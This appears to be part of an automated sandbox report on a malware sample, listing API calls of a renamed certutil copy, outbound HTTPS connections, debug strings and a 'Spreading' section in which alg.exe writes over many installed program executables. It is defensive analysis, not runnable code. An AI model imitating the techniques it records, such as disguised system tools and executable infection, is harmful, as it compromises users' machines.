                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B45AA8 CryptDecodeObjectEx,12_2_00007FF627B45AA8
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AE1A44 CryptContextAddRef,_CxxThrowException,GetLastError,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,12_2_00007FF627AE1A44
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A73A40 LocalFree,LocalFree,strcmp,#357,strcmp,LocalFree,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,LocalFree,strcmp,CryptDecodeObject,strcmp,LocalFree,strcmp,GetLastError,#357,LocalFree,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,GetLastError,#357,strcmp,strcmp,GetLastError,strcmp,CryptDecodeObject,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,GetLastError,strcmp,strcmp,strcmp,strcmp,#357,#357,CryptDecodeObject,GetLastError,GetLastError,strcmp,LocalFree,strcmp,LocalFree,GetLastError,strcmp,GetLastError,LocalFree,LocalFree,LocalFree,LocalFree,12_2_00007FF627A73A40
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B1BA14 NCryptIsKeyHandle,#357,CryptGetProvParam,GetLastError,NCryptFreeObject,12_2_00007FF627B1BA14
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627ACB9CC I_CryptWalkAllLruCacheEntries,I_CryptFindLruEntry,I_CryptRemoveLruEntry,#357,I_CryptWalkAllLruCacheEntries,I_CryptFindLruEntry,I_CryptRemoveLruEntry,#357,12_2_00007FF627ACB9CC
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A6F9B8 strcmp,#357,#359,NCryptOpenStorageProvider,#357,NCryptImportKey,#357,NCryptSetProperty,NCryptFinalizeKey,NCryptFreeObject,NCryptFreeObject,#359,CryptImportPKCS8,GetLastError,#357,CryptGetUserKey,GetLastError,#357,CryptGetUserKey,GetLastError,CryptDestroyKey,CryptReleaseContext,LocalFree,12_2_00007FF627A6F9B8
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B3B980 #357,CryptFindOIDInfo,#359,GetLastError,#357,#359,CryptGetProvParam,memset,CryptGetProvParam,CryptFindOIDInfo,#357,GetLastError,#357,CryptReleaseContext,BCryptFreeBuffer,12_2_00007FF627B3B980
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627ACB950 I_CryptGetLruEntryData,#357,12_2_00007FF627ACB950
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A9F944 CryptDecodeObject,GetLastError,#357,12_2_00007FF627A9F944
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A77988 CryptFindOIDInfo,#357,CryptFindOIDInfo,#357,GetLastError,#357,GetLastError,#357,LocalFree,12_2_00007FF627A77988
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B09970 LocalAlloc,#357,LocalAlloc,CertGetEnhancedKeyUsage,GetLastError,#358,LocalFree,LocalFree,GetLastError,strcmp,#357,CryptFindOIDInfo,LocalFree,12_2_00007FF627B09970
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AC597C GetLastError,CryptEncodeObjectEx,GetLastError,#357,12_2_00007FF627AC597C
                      Source: unknownHTTPS traffic detected: 198.252.105.91:443 -> 192.168.2.10:49731 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.10:49824 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.10:49940 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.10:49953 version: TLS 1.2
                      Source: Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb77.GCTL source: alg.exe, 0000001D.00000003.2479887474.0000000000650000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdb source: alg.exe, 0000001D.00000003.2580817829.0000000000620000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 0000001D.00000003.2598730489.0000000000400000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 0000001D.00000003.2579062872.0000000000610000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: D:\T\BuildResults\bin\Release_x64\TextExtractor.pdb444 source: alg.exe, 0000001D.00000003.2166396626.00000000014A0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: D:\T\BuildResults\bin\Release_x64\TextExtractor.pdb source: alg.exe, 0000001D.00000003.2166396626.00000000014A0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: ADelRCP_Exec.pdb source: alg.exe, 0000001D.00000003.2195638183.0000000001490000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: mavinject32.pdbGCTL source: alg.exe, 0000001D.00000003.2690766843.0000000001490000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: _.pdb source: Native_neworigin.exe, 0000001B.00000002.1714513945.0000000002B26000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 0000001B.00000003.1443226587.000000000065A000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 0000001B.00000002.1767484584.000000000401D000.00000004.00000800.00020000.00000000.sdmp, Native_neworigin.exe, 0000001B.00000002.1781352411.00000000052D0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdb source: alg.exe, 0000001D.00000003.2083482558.0000000000410000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: FXSSVC.pdb source: Native_neworigin.exe, 0000001B.00000003.1644259863.0000000005330000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdb source: alg.exe, 0000001D.00000003.2650684922.0000000000610000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb source: alg.exe, 0000001D.00000003.2517364614.0000000000400000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: cmd.pdb source: alpha.exe, 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp, alpha.exe, 00000009.00000000.1280279137.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp, alpha.exe, 0000000B.00000002.1298327861.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp, alpha.exe, 0000000B.00000000.1285426299.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp, alpha.exe, 0000000D.00000002.1306669852.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp, alpha.exe, 0000000D.00000000.1298979747.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp, alpha.exe, 00000010.00000000.1307623271.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp, alpha.exe, 00000010.00000002.1308916113.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp, alpha.exe, 00000011.00000002.1311273643.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp, alpha.exe, 00000011.00000000.1309412413.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp, esentutl.exe, 00000015.00000003.1414346732.0000000005580000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: easinvoker.pdbGCTL source: AnyDesk.PIF, 0000000F.00000002.1459416504.0000000002E1E000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1311463700.000000007FC50000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1418076900.0000000021AEF000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1311999021.000000007F920000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1311674784.0000000002BB7000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1418076900.0000000021AC0000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1457046440.0000000002BB2000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1496446844.0000000020B24000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1444995649.00000000023C6000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1496446844.0000000020B60000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: ping.pdb source: esentutl.exe, 00000016.00000003.1418764393.00000000056A0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: D:\T\Acrobat\Installers\BootStrapExe_Small\Release_x64\Setup.pdb source: alg.exe, 0000001D.00000003.2568619306.0000000000620000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb888 source: alg.exe, 0000001D.00000003.2264299191.0000000000460000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: Acrobat_SL.pdb((( source: alg.exe, 0000001D.00000003.1936659520.0000000001550000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: DiagnosticsHub.StandardCollector.Service.pdbGCTL source: Native_neworigin.exe, 0000001B.00000003.1519766371.0000000005E50000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: d:\dbs\el\omr\target\x64\ship\click2run\x-none\IntegratedOffice.pdb0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000S source: alg.exe, 0000001D.00000003.2667411347.0000000001490000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: ADelRCP_Exec.pdbCC9 source: alg.exe, 0000001D.00000003.2195638183.0000000001490000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: D:\T\BuildResults\bin\Release_x64\Acrouserer.pdb source: alg.exe, 0000001D.00000003.1954090127.0000000001660000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: easinvoker.pdb source: AnyDesk.PIF, AnyDesk.PIF, 0000000F.00000002.1459416504.0000000002E1E000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1311463700.000000007FC50000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1311999021.000000007F920000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1496446844.0000000020B24000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1444995649.00000000023C6000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1496446844.0000000020B60000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1396114152.000000007DBA0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1397101171.000000007EDB0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1396114152.000000007DCC6000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1557125328.000000007EF26000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: Acrobat_SL.pdb source: alg.exe, 0000001D.00000003.1936659520.0000000001550000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: cmd.pdbUGP source: alpha.exe, 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp, alpha.exe, 00000009.00000000.1280279137.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp, alpha.exe, 0000000B.00000002.1298327861.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp, alpha.exe, 0000000B.00000000.1285426299.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp, alpha.exe, 0000000D.00000002.1306669852.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp, alpha.exe, 0000000D.00000000.1298979747.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp, alpha.exe, 00000010.00000000.1307623271.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp, alpha.exe, 00000010.00000002.1308916113.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp, alpha.exe, 00000011.00000002.1311273643.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp, alpha.exe, 00000011.00000000.1309412413.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp, esentutl.exe, 00000015.00000003.1414346732.0000000005580000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdbU source: alg.exe, 0000001D.00000003.2580817829.0000000000620000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 0000001D.00000003.2598730489.0000000000400000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 0000001D.00000003.2579062872.0000000000610000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: D:\T\Acrobat\Installers\BootStrapExe_Small\Release_x64\Setup.pdb} source: alg.exe, 0000001D.00000003.2568619306.0000000000620000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: ping.pdbGCTL source: esentutl.exe, 00000016.00000003.1418764393.00000000056A0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: certutil.pdb source: kn.exe, 0000000C.00000002.1297481760.00007FF627B5E000.00000002.00000001.01000000.00000006.sdmp, kn.exe, 0000000C.00000000.1286664343.00007FF627B5E000.00000002.00000001.01000000.00000006.sdmp, kn.exe, 0000000E.00000000.1299867443.00007FF627B5E000.00000002.00000001.01000000.00000006.sdmp, kn.exe, 0000000E.00000002.1305778842.00007FF627B5E000.00000002.00000001.01000000.00000006.sdmp
                      Source: Binary string: easinvoker.pdbH source: AnyDesk.PIF, 0000000F.00000003.1396114152.000000007DBA0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1397101171.000000007EDB0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1396114152.000000007DCC6000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1557125328.000000007EF26000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdbT source: alg.exe, 0000001D.00000003.2083482558.0000000000410000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: mavinject32.pdb source: alg.exe, 0000001D.00000003.2690766843.0000000001490000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: maintenanceservice.pdb source: alg.exe, 0000001D.00000003.1831857242.00000000016A0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdbY source: alg.exe, 0000001D.00000003.2650684922.0000000000610000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: certutil.pdbGCTL source: kn.exe, 0000000C.00000002.1297481760.00007FF627B5E000.00000002.00000001.01000000.00000006.sdmp, kn.exe, 0000000C.00000000.1286664343.00007FF627B5E000.00000002.00000001.01000000.00000006.sdmp, kn.exe, 0000000E.00000000.1299867443.00007FF627B5E000.00000002.00000001.01000000.00000006.sdmp, kn.exe, 0000000E.00000002.1305778842.00007FF627B5E000.00000002.00000001.01000000.00000006.sdmp
                      Source: Binary string: E:\jenkins\workspace\NGL_WORKFLOW\build\master\win64\Release\Acrobat\project\win\ngl-workflow\x64\Release (Acrobat)\adobe_licensing_wf_helper_acro.pdb source: alg.exe, 0000001D.00000003.2392507411.0000000000620000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb source: alg.exe, 0000001D.00000003.2264299191.0000000000460000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: AnyDesk.PIF, 0000000F.00000003.1396114152.000000007DBA0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1397101171.000000007EDB0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1396114152.000000007DCC6000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1557125328.000000007EF26000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb source: alg.exe, 0000001D.00000003.2479887474.0000000000650000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_userers\32BitMAPIuserer.pdb@@ source: alg.exe, 0000001D.00000003.2424853674.0000000000620000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: d:\dbs\el\omr\target\x64\ship\click2run\x-none\IntegratedOffice.pdb source: alg.exe, 0000001D.00000003.2667411347.0000000001490000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: maintenanceservice.pdb` source: alg.exe, 0000001D.00000003.1831857242.00000000016A0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb$$ source: alg.exe, 0000001D.00000003.2517364614.0000000000400000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: C:\workspace\CR-Windows-x64-Client-Builder\CRLogTransport\public\binary\Win\x64\Release\CRLogTransport.pdb source: alg.exe, 0000001D.00000003.2297694474.0000000000450000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: ALG.pdb source: Native_neworigin.exe, 0000001B.00000003.1444838110.0000000005B00000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: DiagnosticsHub.StandardCollector.Service.pdb source: Native_neworigin.exe, 0000001B.00000003.1519766371.0000000005E50000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: ALG.pdbGCTL source: Native_neworigin.exe, 0000001B.00000003.1444838110.0000000005B00000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: D:\T\BuildResults\bin\Release_x64\Acrouserer.pdbTTT source: alg.exe, 0000001D.00000003.1954090127.0000000001660000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: FXSSVC.pdbGCTL source: Native_neworigin.exe, 0000001B.00000003.1644259863.0000000005330000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: AppVShNotify.pdb source: alg.exe, 0000001D.00000003.2627543341.0000000000620000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_userers\32BitMAPIuserer.pdb source: alg.exe, 0000001D.00000003.2424853674.0000000000620000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: C:\workspace\CR-Windows-x64-Client-Builder\CRLogTransport\public\binary\Win\x64\Release\CRLogTransport.pdbQ source: alg.exe, 0000001D.00000003.2297694474.0000000000450000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: AppVShNotify.pdbGCTL source: alg.exe, 0000001D.00000003.2627543341.0000000000620000.00000004.00001000.00020000.00000000.sdmp

                      Spreading

                      barindex
                      Infects executable files (exe, dll, sys, html)
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\servertool.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\pingsender.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXE
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.149\chrome_pwa_launcher.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.149\elevation_service.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exe
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeSystem file written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\7-Zip\7z.exe
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeSystem file written: C:\Windows\System32\AppVClient.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\crashreporter.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_userers\64BitMAPIuserer.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\7-Zip\7zG.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_userers\MSRMSPIuserer.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.149\notification_helper.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateuserer.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.149\Installer\chrmstp.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\firefox.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrouserer.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\updater.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Check.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateuserer.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\7-Zip\Uninstall.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeSystem file written: C:\Windows\System32\FXSSVC.exe
                      Source: C:\Users\Public\Libraries\aymtmquJ.pifSystem file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\CLVIEW.EXE
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
